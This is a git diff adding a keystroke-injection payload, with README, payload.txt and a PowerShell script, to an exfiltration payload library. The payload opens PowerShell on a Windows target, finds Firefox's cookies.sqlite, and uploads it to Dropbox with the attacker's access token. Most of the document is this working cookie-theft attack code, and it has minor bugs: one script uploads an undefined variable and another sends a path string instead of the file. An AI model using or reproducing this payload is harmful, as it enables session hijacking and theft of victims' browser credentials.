diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md new file mode 100644 index 0000000..0b1850e --- /dev/null +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md @@ -0,0 +1,21 @@ +# Export Firefox Cookies Database + +This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken. + +**Category**: Exfiltration + +## Description + +This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken. + +Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" at the end, then set your exfiltration settings i.e. Dropbox access token and so on... then export it, then close the powershell. + +## Dependencies + +* Firefox must be installed + +## Settings + +- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. + +`DEFINE DROPBOX_ACCESS_TOKEN "example"` \ No newline at end of file diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt new file mode 100644 index 0000000..98bcbaa --- /dev/null +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt @@ -0,0 +1,47 @@ +REM #################################################### +REM # | +REM # Title : Export Firefox Cookies Database | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM #################################################### + + +REM Requirements: +REM - Firefox must be installed + + +REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. +DEFINE DROPBOX_ACCESS_TOKEN "example" + +DEFAULT_DELAY 500 +GUI r +STRINGLN powershell +DELAY 2000 + + +REM Get cookies DB path +STRINGLN_BLOCK + $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' + $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"} + $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' +END_STRINGLN + +REM Setting about exfiltration +STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN +ENTER + +STRINGLN_BLOCK + $uploadUrl = "https://content.dropboxapi.com/2/files/upload" + + $dropboxFilePath = "/cookies_exported.sqlite" + + $headers = @{} + $headers.Add("Authorization", "Bearer $accessToken") + $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}') + $headers.Add("Content-Type", "application/octet-stream") + + Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit; +END_STRINGLN diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 b/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 new file mode 100644 index 0000000..1d15a29 --- /dev/null +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 @@ -0,0 +1,19 @@ + + +$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' +$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"} + +$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' + +$accessToken = "" +$authHeader = @{Authorization = "Bearer $accessToken"} +$dropboxFilePath = "/cookies_exported.sqlite" + +$uploadUrl = "https://content.dropboxapi.com/2/files/upload" + +$headers = @{} +$headers.Add("Authorization", "Bearer $accessToken") +$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}') +$headers.Add("Content-Type", "application/octet-stream") + +Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent